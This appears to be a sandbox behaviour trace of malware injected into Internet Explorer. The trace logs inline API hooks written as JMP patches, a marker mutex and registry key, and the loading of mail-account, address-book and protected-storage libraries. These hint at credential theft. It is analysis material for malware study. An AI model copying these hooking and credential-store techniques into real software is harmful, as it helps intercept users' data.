Memory attributes changed PID: 1712 Path: C:\Program Files\Internet Explorer\iexplore.exe Base: 7C90D1AE Length: 1000 New Protection: page execute read New Protection: page execute and read and write success or wait 2658042171
Memory attributes changed PID: 1712 Path: C:\Program Files\Internet Explorer\iexplore.exe Base: 7C91632D Length: 1000 New Protection: page execute and read and write New Protection: page execute read success or wait 2658044516
Memory read PID: 1712 Path: C:\Program Files\Internet Explorer\iexplore.exe Base: 7C91632D Length: 30 Value: 68 6C 02 00 00 68 80 64 91 7C E8 8F 85 FF FF A1 C8 E0 97 7C 89 45 E4 8B 45 08 89 85 B4 FD success or wait 2658044873
Memory written PID: 1712 Path: C:\Program Files\Internet Explorer\iexplore.exe Base: 819000A Length: 10 Value: 68 6C 02 00 00 E9 1E 63 78 74 success or wait 2658045863
Memory written PID: 1712 Path: C:\Program Files\Internet Explorer\iexplore.exe Base: 7C91632D Length: 5 Value: E9 09 1F 70 8B success or wait 2658046801
Memory attributes changed PID: 1712 Path: C:\Program Files\Internet Explorer\iexplore.exe Base: 7C91632D Length: 1000 New Protection: page execute read New Protection: page execute and read and write success or wait 2658047121
Memory attributes changed PID: 1712 Path: C:\Program Files\Internet Explorer\iexplore.exe Base: 77212EBC Length: 1000 New Protection: page execute and read and write New Protection: page execute read success or wait 2658048147
Memory read PID: 1712 Path: C:\Program Files\Internet Explorer\iexplore.exe Base: 77212EBC Length: 30 Value: 8B FF 55 8B EC 83 EC 14 53 33 DB 56 33 F6 33 C0 39 5D 08 57 89 5D F8 89 5D EC 89 5D FC 75 success or wait 2658048511
Memory written PID: 1712 Path: C:\Program Files\Internet Explorer\iexplore.exe Base: 8190014 Length: 10 Value: 8B FF 55 8B EC E9 A3 2E 08 6F success or wait 2658049555
Memory written PID: 1712 Path: C:\Program Files\Internet Explorer\iexplore.exe Base: 77212EBC Length: 5 Value: E9 FD 4B DF 90 success or wait 2658050491
Memory attributes changed PID: 1712 Path: C:\Program Files\Internet Explorer\iexplore.exe Base: 77212EBC Length: 1000 New Protection: page execute read New Protection: page execute and read and write success or wait 2658051016
Memory attributes changed PID: 1712 Path: C:\Program Files\Internet Explorer\iexplore.exe Base: 771C60A1 Length: 1000 New Protection: page execute and read and write New Protection: page execute read success or wait 2658053207
Memory read PID: 1712 Path: C:\Program Files\Internet Explorer\iexplore.exe Base: 771C60A1 Length: 30 Value: 8B FF 55 8B EC 6A 13 6A 00 FF 75 18 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 36 C6 FF FF 5D success or wait 2658053632
Memory written PID: 1712 Path: C:\Program Files\Internet Explorer\iexplore.exe Base: 819001E Length: 10 Value: 8B FF 55 8B EC E9 7E 60 03 6F success or wait 2658054620
Memory written PID: 1712 Path: C:\Program Files\Internet Explorer\iexplore.exe Base: 771C60A1 Length: 5 Value: E9 6F 1A E4 90 success or wait 2658055558
Memory attributes changed PID: 1712 Path: C:\Program Files\Internet Explorer\iexplore.exe Base: 771C60A1 Length: 1000 New Protection: page execute read New Protection: page execute and read and write success or wait 2658055878
Memory attributes changed PID: 1712 Path: C:\Program Files\Internet Explorer\iexplore.exe Base: 771CE9C1 Length: 1000 New Protection: page execute and read and write New Protection: page execute read success or wait 2658057916
Memory read PID: 1712 Path: C:\Program Files\Internet Explorer\iexplore.exe Base: 771CE9C1 Length: 30 Value: 8B FF 55 8B EC 83 EC 14 53 56 33 C0 57 33 D2 33 DB 33 FF 33 C9 39 55 08 89 45 F8 89 45 EC success or wait 2658058333
Memory written PID: 1712 Path: C:\Program Files\Internet Explorer\iexplore.exe Base: 8190028 Length: 10 Value: 8B FF 55 8B EC E9 94 E9 03 6F success or wait 2658059315
Memory written PID: 1712 Path: C:\Program Files\Internet Explorer\iexplore.exe Base: 771CE9C1 Length: 5 Value: E9 A6 91 E3 90 success or wait 2658060247
Memory attributes changed PID: 1712 Path: C:\Program Files\Internet Explorer\iexplore.exe Base: 771CE9C1 Length: 1000 New Protection: page execute read New Protection: page execute and read and write success or wait 2658060565
Memory attributes changed PID: 1712 Path: C:\Program Files\Internet Explorer\iexplore.exe Base: 77212FC1 Length: 1000 New Protection: page execute and read and write New Protection: page execute read success or wait 2658061558
Memory read PID: 1712 Path: C:\Program Files\Internet Explorer\iexplore.exe Base: 77212FC1 Length: 30 Value: 8B FF 55 8B EC 53 56 57 33 DB 33 C0 33 C9 33 D2 33 FF 39 5D 10 75 39 8B 75 0C 85 F6 74 21 success or wait 2658061856
Memory written PID: 1712 Path: C:\Program Files\Internet Explorer\iexplore.exe Base: 8190032 Length: 10 Value: 8B FF 55 8B EC E9 8A 2F 08 6F success or wait 2658062829
Memory written PID: 1712 Path: C:\Program Files\Internet Explorer\iexplore.exe Base: 77212FC1 Length: 5 Value: E9 4B 4C DF 90 success or wait 2658063757
Memory attributes changed PID: 1712 Path: C:\Program Files\Internet Explorer\iexplore.exe Base: 77212FC1 Length: 1000 New Protection: page execute read New Protection: page execute and read and write success or wait 2658064022
Memory attributes changed PID: 1712 Path: C:\Program Files\Internet Explorer\iexplore.exe Base: 771C4D8C Length: 1000 New Protection: page execute and read and write New Protection: page execute read success or wait 2658066087
Memory read PID: 1712 Path: C:\Program Files\Internet Explorer\iexplore.exe Base: 771C4D8C Length: 30 Value: 8B FF 55 8B EC 51 51 53 56 33 DB 33 F6 F6 05 94 BD 23 77 01 89 5D FC 0F 84 BA 7E 00 00 39 success or wait 2658066502
Memory written PID: 1712 Path: C:\Program Files\Internet Explorer\iexplore.exe Base: 819003C Length: 10 Value: 8B FF 55 8B EC E9 4B 4D 03 6F success or wait 2658067538
Memory written PID: 1712 Path: C:\Program Files\Internet Explorer\iexplore.exe Base: 771C4D8C Length: 5 Value: E9 25 2F E4 90 success or wait 2658068465
Memory attributes changed PID: 1712 Path: C:\Program Files\Internet Explorer\iexplore.exe Base: 771C4D8C Length: 1000 New Protection: page execute read New Protection: page execute and read and write success or wait 2658068781
Memory attributes changed PID: 1712 Path: C:\Program Files\Internet Explorer\iexplore.exe Base: 771C82EA Length: 1000 New Protection: page execute and read and write New Protection: page execute read success or wait 2658070845
Memory read PID: 1712 Path: C:\Program Files\Internet Explorer\iexplore.exe Base: 771C82EA Length: 30 Value: 8B FF 55 8B EC 83 EC 24 53 33 DB 39 1D 8C B8 23 77 57 89 5D F4 89 5D F8 89 5D F0 C7 45 E8 success or wait 2658071260
Memory written PID: 1712 Path: C:\Program Files\Internet Explorer\iexplore.exe Base: 8190046 Length: 10 Value: 8B FF 55 8B EC E9 9F 82 03 6F success or wait 2658072546
Memory written PID: 1712 Path: C:\Program Files\Internet Explorer\iexplore.exe Base: 771C82EA Length: 5 Value: E9 0A FA E3 90 success or wait 2658073485
Memory attributes changed PID: 1712 Path: C:\Program Files\Internet Explorer\iexplore.exe Base: 771C82EA Length: 1000 New Protection: page execute read New Protection: page execute and read and write success or wait 2658073805
Memory attributes changed PID: 1712 Path: C:\Program Files\Internet Explorer\iexplore.exe Base: 771F9100 Length: 1000 New Protection: page execute and read and write New Protection: page execute read success or wait 2658075195
Memory read PID: 1712 Path: C:\Program Files\Internet Explorer\iexplore.exe Base: 771F9100 Length: 30 Value: 8B FF 55 8B EC 83 EC 20 53 56 33 C0 57 33 FF 40 39 3D 8C B8 23 77 89 7D FC 89 7D F8 89 45 success or wait 2658075615
Memory written PID: 1712 Path: C:\Program Files\Internet Explorer\iexplore.exe Base: 8190050 Length: 10 Value: 8B FF 55 8B EC E9 AB 90 06 6F success or wait 2658076601
Memory written PID: 1712 Path: C:\Program Files\Internet Explorer\iexplore.exe Base: 771F9100 Length: 5 Value: E9 34 EC E0 90 success or wait 2658077540
Memory attributes changed PID: 1712 Path: C:\Program Files\Internet Explorer\iexplore.exe Base: 771F9100 Length: 1000 New Protection: page execute read New Protection: page execute and read and write success or wait 2658077862
Memory attributes changed PID: 1712 Path: C:\Program Files\Internet Explorer\iexplore.exe Base: 771D89F7 Length: 1000 New Protection: page execute and read and write New Protection: page execute read success or wait 2658079711
Memory read PID: 1712 Path: C:\Program Files\Internet Explorer\iexplore.exe Base: 771D89F7 Length: 30 Value: 8B FF 55 8B EC 83 EC 10 53 33 DB 39 1D 8C B8 23 77 56 57 89 5D FC C7 45 F8 01 00 00 00 0F success or wait 2658080133
Memory written PID: 1712 Path: C:\Program Files\Internet Explorer\iexplore.exe Base: 819005A Length: 10 Value: 8B FF 55 8B EC E9 98 89 04 6F success or wait 2658081123
Memory written PID: 1712 Path: C:\Program Files\Internet Explorer\iexplore.exe Base: 771D89F7 Length: 5 Value: E9 8B F3 E2 90 success or wait 2658082063
Memory attributes changed PID: 1712 Path: C:\Program Files\Internet Explorer\iexplore.exe Base: 771D89F7 Length: 1000 New Protection: page execute read New Protection: page execute and read and write success or wait 2658082383
Memory attributes changed PID: 1712 Path: C:\Program Files\Internet Explorer\iexplore.exe Base: 771C79C2 Length: 1000 New Protection: page execute and read and write New Protection: page execute read success or wait 2658084440
Memory read PID: 1712 Path: C:\Program Files\Internet Explorer\iexplore.exe Base: 771C79C2 Length: 30 Value: 6A 2C 68 10 7B 1C 77 E8 A7 9C FE FF 33 DB 89 5D DC 89 5D E4 39 1D 8C B8 23 77 0F 84 E8 95 success or wait 2658084945
Memory written PID: 1712 Path: C:\Program Files\Internet Explorer\iexplore.exe Base: 8190064 Length: 12 Value: 6A 2C 68 10 7B 1C 77 E9 59 79 03 6F success or wait 2658085940
Memory written PID: 1712 Path: C:\Program Files\Internet Explorer\iexplore.exe Base: 771C79C2 Length: 5 Value: E9 F0 03 E4 90 success or wait 2658087099
Memory attributes changed PID: 1712 Path: C:\Program Files\Internet Explorer\iexplore.exe Base: 771C79C2 Length: 1000 New Protection: page execute read New Protection: page execute and read and write success or wait 2658088314
Memory attributes changed PID: 1712 Path: C:\Program Files\Internet Explorer\iexplore.exe Base: 771F9C53 Length: 1000 New Protection: page execute and read and write New Protection: page execute read success or wait 2658104328
Memory read PID: 1712 Path: C:\Program Files\Internet Explorer\iexplore.exe Base: 771F9C53 Length: 30 Value: 8B FF 55 8B EC 6A 01 FF 75 0C FF 75 08 E8 1A F4 FD FF 5D C2 08 00 90 90 90 90 90 8B FF 55 success or wait 2658104633
Memory written PID: 1712 Path: C:\Program Files\Internet Explorer\iexplore.exe Base: 8190070 Length: 10 Value: 8B FF 55 8B EC E9 DE 9B 06 6F success or wait 2658105622
Memory written PID: 1712 Path: C:\Program Files\Internet Explorer\iexplore.exe Base: 771F9C53 Length: 5 Value: E9 B4 E1 E0 90 success or wait 2658106557
Memory attributes changed PID: 1712 Path: C:\Program Files\Internet Explorer\iexplore.exe Base: 771F9C53 Length: 1000 New Protection: page execute read New Protection: page execute and read and write success or wait 2658106824
Memory attributes changed PID: 1712 Path: C:\Program Files\Internet Explorer\iexplore.exe Base: 771D9064 Length: 1000 New Protection: page execute and read and write New Protection: page execute read success or wait 2658108673
Memory read PID: 1712 Path: C:\Program Files\Internet Explorer\iexplore.exe Base: 771D9064 Length: 30 Value: 8B FF 55 8B EC 6A 00 FF 75 0C FF 75 08 E8 09 00 00 00 5D C2 08 00 90 90 90 90 90 8B FF 55 success or wait 2658109094
Memory written PID: 1712 Path: C:\Program Files\Internet Explorer\iexplore.exe Base: 819007A Length: 10 Value: 8B FF 55 8B EC E9 E5 8F 04 6F success or wait 2658110073
Memory written PID: 1712 Path: C:\Program Files\Internet Explorer\iexplore.exe Base: 771D9064 Length: 5 Value: E9 BB ED E2 90 success or wait 2658111071
Memory attributes changed PID: 1712 Path: C:\Program Files\Internet Explorer\iexplore.exe Base: 771D9064 Length: 1000 New Protection: page execute read New Protection: page execute and read and write success or wait 2658111392
Memory attributes changed PID: 1712 Path: C:\Program Files\Internet Explorer\iexplore.exe Base: 771BB1D8 Length: 1000 New Protection: page execute and read and write New Protection: page execute read success or wait 2658113515
Memory read PID: 1712 Path: C:\Program Files\Internet Explorer\iexplore.exe Base: 771BB1D8 Length: 30 Value: 8B FF 55 8B EC 83 EC 48 53 8B 5D 10 56 33 F6 39 75 14 57 8B 7D 0C C7 45 F4 01 00 00 00 89 success or wait 2658113943
Memory written PID: 1712 Path: C:\Program Files\Internet Explorer\iexplore.exe Base: 8190084 Length: 10 Value: 8B FF 55 8B EC E9 4F B1 02 6F success or wait 2658114973
Memory written PID: 1712 Path: C:\Program Files\Internet Explorer\iexplore.exe Base: 771BB1D8 Length: 5 Value: E9 5F CC E4 90 success or wait 2658115972
Memory attributes changed PID: 1712 Path: C:\Program Files\Internet Explorer\iexplore.exe Base: 771BB1D8 Length: 1000 New Protection: page execute read New Protection: page execute and read and write success or wait 2658116302
Memory attributes changed PID: 1712 Path: C:\Program Files\Internet Explorer\iexplore.exe Base: 71AB3E2B Length: 1000 New Protection: page execute and read and write New Protection: page execute read success or wait 2658117018
Memory read PID: 1712 Path: C:\Program Files\Internet Explorer\iexplore.exe Base: 71AB3E2B Length: 30 Value: 8B FF 55 8B EC 51 81 3D 50 40 AC 71 29 2C AB 71 56 0F 84 BC 4F 00 00 E8 3A E8 FF FF 85 C0 success or wait 2658117485
Memory written PID: 1712 Path: C:\Program Files\Internet Explorer\iexplore.exe Base: 819008E Length: 10 Value: 8B FF 55 8B EC E9 98 3D 92 69 success or wait 2658118459
Memory written PID: 1712 Path: C:\Program Files\Internet Explorer\iexplore.exe Base: 71AB3E2B Length: 5 Value: E9 3E E9 55 96 success or wait 2658119485
Memory attributes changed PID: 1712 Path: C:\Program Files\Internet Explorer\iexplore.exe Base: 71AB3E2B Length: 1000 New Protection: page execute read New Protection: page execute and read and write success or wait 2658119825
Memory read PID: 1712 Path: C:\Program Files\Internet Explorer\iexplore.exe Base: 71AB4C27 Length: 30 Value: 8B FF 55 8B EC 83 EC 10 56 57 33 FF 81 3D 50 40 AC 71 29 2C AB 71 0F 84 25 6A 00 00 8D 45 success or wait 2658120959
Memory read PID: 1712 Path: C:\Program Files\Internet Explorer\iexplore.exe Base: 71AB68FA Length: 30 Value: 8B FF 55 8B EC 51 51 81 3D 50 40 AC 71 29 2C AB 71 56 0F 84 CD 4D 00 00 8D 45 F8 50 E8 98 success or wait 2658125122
Memory read PID: 1712 Path: C:\Program Files\Internet Explorer\iexplore.exe Base: 71AB676F Length: 30 Value: 8B FF 55 8B EC 83 EC 10 53 33 DB 81 3D 50 40 AC 71 29 2C AB 71 56 0F 84 5E 4A 00 00 8D 45 success or wait 2658128418
Memory read PID: 1712 Path: C:\Program Files\Internet Explorer\iexplore.exe Base: 71AB4CB5 Length: 30 Value: 8B FF 55 8B EC 51 51 81 3D 50 40 AC 71 29 2C AB 71 56 0F 84 80 65 00 00 8D 45 F8 50 E8 DD success or wait 2658131540
Memory read PID: 1712 Path: C:\Program Files\Internet Explorer\iexplore.exe Base: 7E41ECA3 Length: 30 Value: B8 D7 11 00 00 BA 00 03 FE 7F FF 12 C2 0C 00 90 90 90 90 90 6A 2F 6A 01 E8 EE 97 FF FF 6A success or wait 2658136287
Memory read PID: 1712 Path: C:\Program Files\Internet Explorer\iexplore.exe Base: 7E41FE6E Length: 30 Value: B8 2E 12 00 00 BA 00 03 FE 7F FF 12 C2 04 00 33 FF 47 83 7D E4 FF 0F 85 AC AC FF FF C7 45 success or wait 2658141078
Memory read PID: 1712 Path: C:\Program Files\Internet Explorer\iexplore.exe Base: 7E428D20 Length: 30 Value: 6A 14 68 90 8D 42 7E E8 94 F8 FE FF E8 0B F9 FE FF 83 3D 8C 10 47 7E 00 75 08 85 C0 0F 84 success or wait 2658145698
Memory read PID: 1712 Path: C:\Program Files\Internet Explorer\iexplore.exe Base: 7E42C17E Length: 30 Value: 6A 14 68 F0 C1 42 7E E8 36 C4 FE FF E8 AD C4 FE FF 83 3D 8C 10 47 7E 00 75 08 85 C0 0F 84 success or wait 2658151122
Memory read PID: 1712 Path: C:\Program Files\Internet Explorer\iexplore.exe Base: 7E423D3A Length: 30 Value: 8B FF 55 8B EC 8B 4D 08 E8 99 47 FF FF 85 C0 74 11 6A 00 FF 75 14 FF 75 10 FF 75 0C 50 E8 success or wait 2658155839
Memory read PID: 1712 Path: C:\Program Files\Internet Explorer\iexplore.exe Base: 7E43E577 Length: 30 Value: 8B FF 55 8B EC 8B 4D 08 E8 5C 9F FD FF 85 C0 74 11 6A 01 FF 75 14 FF 75 10 FF 75 0C 50 E8 success or wait 2658160717
Memory read PID: 1712 Path: C:\Program Files\Internet Explorer\iexplore.exe Base: 7E430833 Length: 30 Value: 8B FF 55 8B EC 6A 00 FF 75 18 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 09 00 00 00 5D C2 14 success or wait 2658179359
Memory read PID: 1712 Path: C:\Program Files\Internet Explorer\iexplore.exe Base: 7E44F965 Length: 30 Value: 8B FF 55 8B EC 6A 01 FF 75 18 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 D7 0E FE FF 5D C2 14 success or wait 2658183223
Memory read PID: 1712 Path: C:\Program Files\Internet Explorer\iexplore.exe Base: 7E430A47 Length: 30 Value: 8B FF 55 8B EC 6A 00 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 09 00 00 00 5D C2 10 00 90 90 success or wait 2658187618
Memory read PID: 1712 Path: C:\Program Files\Internet Explorer\iexplore.exe Base: 7E44F9B4 Length: 30 Value: 8B FF 55 8B EC 6A 01 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 9C 10 FE FF 5D C2 10 00 90 90 success or wait 2658193892
Memory read PID: 1712 Path: C:\Program Files\Internet Explorer\iexplore.exe Base: 7E42A01E Length: 30 Value: 8B FF 55 8B EC 6A 00 FF 75 18 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 89 FF FF FF 5D C2 14 success or wait 2658198631
System info queried Type: ProcessInformation success or wait 2658636727
Section loaded Path: unknown Access: query and write and read Type: commit Baseaddress: 82A0000 Size: 12288 Protection: read write Mapped to pid: own pid success or wait 2658643940
Thread created PID: 1712 TID: 1276 EIP: 7C8106F9 Imagepath: C:\Program Files\Internet Explorer\iexplore.exe Injected: false success or wait 2658814525
Mutant created Name: \BaseNamedObjects\Global\{F1516FED-D191-40B4-FB56-FD56EA1DDE44} object name exists 2658822872
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Noycir Name: 15807505 success or wait 2664235762
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Noycir Name: 15807505 success or wait 2664236292
Section loaded Path: C:\WINDOWS\system32\msoeacct.dll Access: write and read and execute Type: commit Baseaddress: 82A0000 Size: 253952 Protection: execute Mapped to pid: own pid success or wait 2664252890
Section loaded Path: C:\WINDOWS\system32\msoeacct.dll Access: write and read and execute Type: commit Baseaddress: 82A0000 Size: 253952 Protection: execute Mapped to pid: own pid success or wait 2664255575
Section loaded Path: C:\WINDOWS\system32\msoeacct.dll Access: query and write and read and execute Type: image Baseaddress: 68810000 Size: 270336 Protection: read write Mapped to pid: own pid success or wait 2664258253
Section loaded Path: \KnownDlls\MSOERT2.dll Access: write and read and execute Type: unknown Baseaddress: 68810000 Size: 270336 Protection: read write Mapped to pid: own pid object name not found 2664259872
Section loaded Path: C:\WINDOWS\system32\msoert2.dll Access: query and write and read and execute Type: image Baseaddress: 76880000 Size: 139264 Protection: read write Mapped to pid: own pid success or wait 2664261702
Section loaded Path: C:\WINDOWS\WindowsShell.Manifest Access: write and read and execute Type: commit Baseaddress: 82B0000 Size: 4096 Protection: execute Mapped to pid: own pid success or wait 2664296511
Section loaded Path: C:\WINDOWS\WindowsShell.Manifest Access: query and read Type: commit Baseaddress: 82B0000 Size: 4096 Protection: readonly Mapped to pid: own pid success or wait 2664299832
Section loaded Path: C:\WINDOWS\WindowsShell.Manifest Access: read Type: commit Baseaddress: 82B0000 Size: 4096 Protection: readonly Mapped to pid: own pid success or wait 2664356735
Section loaded Path: C:\WINDOWS\WindowsShell.Manifest Access: write and read and execute Type: commit Baseaddress: 82D0000 Size: 4096 Protection: execute Mapped to pid: own pid success or wait 2664396539
Section loaded Path: C:\WINDOWS\WindowsShell.Manifest Access: query and read Type: commit Baseaddress: 82D0000 Size: 4096 Protection: readonly Mapped to pid: own pid success or wait 2664401346
Section loaded Path: C:\WINDOWS\WindowsShell.Manifest Access: read Type: commit Baseaddress: 82D0000 Size: 4096 Protection: readonly Mapped to pid: own pid success or wait 2664469027
Section loaded Path: C:\WINDOWS\system32\acctres.dll Access: write and read and execute Type: commit Baseaddress: 82D0000 Size: 65536 Protection: execute Mapped to pid: own pid success or wait 2664569223
Section loaded Path: C:\WINDOWS\system32\acctres.dll Access: write and read and execute Type: commit Baseaddress: 82D0000 Size: 65536 Protection: execute Mapped to pid: own pid success or wait 2664572438
Section loaded Path: C:\WINDOWS\system32\acctres.dll Access: query and write and read and execute Type: image Baseaddress: 71780000 Size: 73728 Protection: read write Mapped to pid: own pid success or wait 2664578077
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Internet Account Manager\Accounts Name: NULL success or wait 2664674516
Section loaded Path: C:\Program Files\Common Files\System\wab32.dll Access: write and read and execute Type: commit Baseaddress: 82F0000 Size: 512000 Protection: execute Mapped to pid: own pid success or wait 2664676568
Section loaded Path: C:\Program Files\Common Files\System\wab32.dll Access: write and read and execute Type: commit Baseaddress: 82F0000 Size: 512000 Protection: execute Mapped to pid: own pid success or wait 2664678291
Section loaded Path: C:\Program Files\Common Files\System\wab32.dll Access: query and write and read and execute Type: image Baseaddress: 470D0000 Size: 528384 Protection: read write Mapped to pid: own pid success or wait 2664680537
Section loaded Path: C:\Program Files\Common Files\System\wab32res.dll Access: write and read and execute Type: commit Baseaddress: 82F0000 Size: 249856 Protection: execute Mapped to pid: own pid success or wait 2664695031
Section loaded Path: C:\Program Files\Common Files\System\wab32res.dll Access: write and read and execute Type: commit Baseaddress: 82F0000 Size: 249856 Protection: execute Mapped to pid: own pid success or wait 2664744913
Section loaded Path: C:\Program Files\Common Files\System\wab32res.dll Access: query and write and read and execute Type: image Baseaddress: 35F40000 Size: 258048 Protection: read write Mapped to pid: own pid success or wait 2664747530
System info queried Type: ProcessInformation success or wait 2665232559
Section loaded Path: unknown Access: query and write and read Type: commit Baseaddress: 82D0000 Size: 12288 Protection: read write Mapped to pid: own pid success or wait 2665241340
Thread created PID: 1712 TID: 2128 EIP: 7C8106F9 Imagepath: C:\Program Files\Internet Explorer\iexplore.exe Injected: false success or wait 2665463772
Section loaded Path: C:\WINDOWS\system32\msident.dll Access: write and read and execute Type: commit Baseaddress: 82D0000 Size: 53248 Protection: execute Mapped to pid: own pid success or wait 2666078147
Section loaded Path: C:\WINDOWS\system32\msident.dll Access: write and read and execute Type: commit Baseaddress: 82D0000 Size: 53248 Protection: execute Mapped to pid: own pid success or wait 2666162476
Section loaded Path: C:\WINDOWS\system32\msident.dll Access: query and write and read and execute Type: image Baseaddress: 608A0000 Size: 61440 Protection: read write Mapped to pid: own pid success or wait 2666165344
Section loaded Path: C:\WINDOWS\system32\msident.dll Access: read Type: commit Baseaddress: 82D0000 Size: 53248 Protection: readonly Mapped to pid: own pid success or wait 2666189840
Section loaded Path: C:\WINDOWS\system32\msidntld.dll Access: write and read and execute Type: commit Baseaddress: 82D0000 Size: 16384 Protection: execute Mapped to pid: own pid success or wait 2666244399
Section loaded Path: C:\WINDOWS\system32\msidntld.dll Access: write and read and execute Type: commit Baseaddress: 82D0000 Size: 16384 Protection: execute Mapped to pid: own pid success or wait 2666316383
Section loaded Path: C:\WINDOWS\system32\msidntld.dll Access: query and write and read and execute Type: image Baseaddress: 60890000 Size: 24576 Protection: read write Mapped to pid: own pid success or wait 2666319835
Section loaded Path: \KnownDlls\PSTOREC.DLL Access: write and read and execute Type: unknown Baseaddress: 60890000 Size: 24576 Protection: read write Mapped to pid: own pid object name not found 2666346256
Section loaded Path: C:\WINDOWS\system32\pstorec.dll Access: query and write and read and execute Type: image Baseaddress: 5E0C0000 Size: 53248 Protection: read write Mapped to pid: own pid success or wait 2666353363
Section loaded Path: \KnownDlls\ATL.DLL Access: write and read and execute Type: unknown Baseaddress: 5E0C0000 Size: 53248 Protection: read write Mapped to pid: own pid object name not found 2666535268
Section loaded Path: C:\WINDOWS\system32\atl.dll Access: query and write and read and execute Type: image Baseaddress: 76B20000 Size: 69632 Protection: read write Mapped to pid: own pid success or wait 2666538153
Windows enumerated Desktop: 0 Parent: 0 Enum Children: false TID: 4FC HWNDs: 5029c, 801d6, 1, 901aa, 5015c, 50174, 5015e, 3016e, 1, 5c726f74, 6c707041, 74616369, 206e6f69, 61746144, 796b535c success or wait 2666847620
Windows enumerated Desktop: 0 Parent: 0 Enum Children: false TID: 4FC HWNDs: 5029c, 801d6, 1, 901aa, 5015c, 50174, 5015e, 3016e, 1, 5c726f74, 6c707041, 74616369, 206e6f69, 61746144, 796b535c success or wait 2666848580
Windows enumerated Desktop: 0 Parent: 0 Enum Children: false TID: 4FC HWNDs: 5029c, 801d6, 1, 901aa, 5015c, 50174, 5015e, 3016e, 1, 5c726f74, 6c707041, 74616369, 206e6f69, 61746144, 796b535c success or wait 2666849145
Windows enumerated Desktop: 0 Parent: 0 Enum Children: false TID: 4FC HWNDs: 5029c, 801d6, 1, 901aa, 5015c, 50174, 5015e, 3016e, 1, 5c726f74, 6c707041, 74616369, 206e6f69, 61746144, 796b535c success or wait 2666849707
Windows enumerated Desktop: 0 Parent: 0 Enum Children: false TID: 4FC HWNDs: 5029c, 1, 530049, 520054, 5c0059, 530055, 520045, 53005c, 31002d, 35002d, 32002d, 2d0031, 300035, 390037, 310032 success or wait 2666850339
Key value replaced with new Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Noycir Name: 15807505 Type: Dword Data: -1521036924 Old data: -1521036860 success or wait 2666897423
Windows enumerated Desktop: 0 Parent: 0 Enum Children: false TID: 6C8 HWNDs: 50122, 400c0, 30132, 30130, 30166, 60176, 30116, 400e0, 5013a, 40134, 60104, 30146, 50102, 700f8, 900fe success or wait 2819802544
Windows enumerated Desktop: 0 Parent: 0 Enum Children: false TID: 6C8 HWNDs: 50122, 400c0, 30132, 30130, 30166, 60176, 30116, 400e0, 5013a, 40134, 60104, 30146, 50102, 700f8, 900fe success or wait 2819807509
System info queried Type: ProcessInformation success or wait 2821406742
Section loaded Path: unknown Access: query and write and read Type: commit Baseaddress: C40000 Size: 12288 Protection: read write Mapped to pid: own pid success or wait 2821427633
Thread created PID: 1712 TID: 2736 EIP: 7C8106F9 Imagepath: C:\Program Files\Internet Explorer\iexplore.exe Injected: false success or wait 2821893969
Windows enumerated Desktop: 0 Parent: 0 Enum Children: false TID: 1CC HWNDs: 3011a, 30114, 1, 30166, 60176, 30116, 400e0, 40134, 60104, 30146, 700f8, 900fe, 90112, 60108, 1 success or wait 2826653577
Windows enumerated Desktop: 0 Parent: 0 Enum Children: false TID: 1CC HWNDs: 3011a, 30114, 1, 30166, 60176, 30116, 400e0, 40134, 60104, 30146, 700f8, 900fe, 90112, 60108, 1 success or wait 2827004328
Windows enumerated Desktop: 0 Parent: 0 Enum Children: false TID: 1CC HWNDs: 3011a, 30114, 1, 30166, 60176, 30116, 400e0, 40134, 60104, 30146, 700f8, 900fe, 90112, 60108, 1 success or wait 2827034747
Windows enumerated Desktop: 0 Parent: 0 Enum Children: false TID: 6C8 HWNDs: 400c0, 30166, 60176, 30116, 400e0, 40134, 60104, 30146, 700f8, 900fe, 90112, 60108, 1, 60108, 1 success or wait 2827425689
Section loaded Path: \BaseNamedObjects\ASMWIN0 Access: query and write and read Type: commit Baseaddress: C40000 Size: 12288 Protection: read write Mapped to pid: own pid success or wait 2827483315
Windows enumerated Desktop: 0 Parent: 0 Enum Children: false TID: 6C8 HWNDs: 400c0, 30166, 60176, 30116, 400e0, 40134, 60104, 30146, 700f8, 900fe, 90112, 60108, 1, 60108, 1 success or wait 2827556750
Windows enumerated Desktop: 0 Parent: 0 Enum Children: false TID: 6C8 HWNDs: 400c0, 30166, 60176, 30116, 400e0, 40134, 60104, 30146, 700f8, 900fe, 90112, 60108, 1, 60108, 1 success or wait 2827695066
Windows enumerated Desktop: 0 Parent: 0 Enum Children: false TID: 6C8 HWNDs: 400c0, 30166, 60176, 30116, 400e0, 40134, 60104, 30146, 700f8, 900fe, 90112, 60108, 1, 60108, 1 success or wait 2827892392
Windows enumerated Desktop: 0 Parent: 0 Enum Children: false TID: 6C8 HWNDs: 400c0, 30166, 60176, 30116, 400e0, 40134, 60104, 30146, 700f8, 900fe, 90112, 60108, 1, 60108, 1 success or wait 2827923383
Windows enumerated Desktop: 0 Parent: 0 Enum Children: false TID: 6C8 HWNDs: 400c0, 30166, 60176, 30116, 400e0, 40134, 60104, 30146, 700f8, 900fe, 90112, 60108, 1, 60108, 1 success or wait 2827925369
Windows enumerated Desktop: 0 Parent: 0 Enum Children: false TID: 6C8 HWNDs: 400e0, 40134, 60104, 30146, 700f8, 900fe, 90112, 60108, 1, 2eba, 0, 57005c, 4e0049, 4f0044, 1 success or wait 2828866297
Windows enumerated Desktop: 0 Parent: 0 Enum Children: false TID: 6C8 HWNDs: 400e0, 40134, 60104, 30146, 700f8, 900fe, 90112, 60108, 1, 2eba, 0, 57005c, 4e0049, 4f0044, 1 success or wait 2828868316
System info queried Type: ProcessInformation success or wait 2830171013
Section loaded Path: unknown Access: query and write and read Type: commit Baseaddress: CB0000 Size: 12288 Protection: read write Mapped to pid: own pid success or wait 2830187401
Thread created PID: 1712 TID: 2812 EIP: 7C8106F9 Imagepath: C:\Program Files\Internet Explorer\iexplore.exe Injected: false success or wait 2830484181
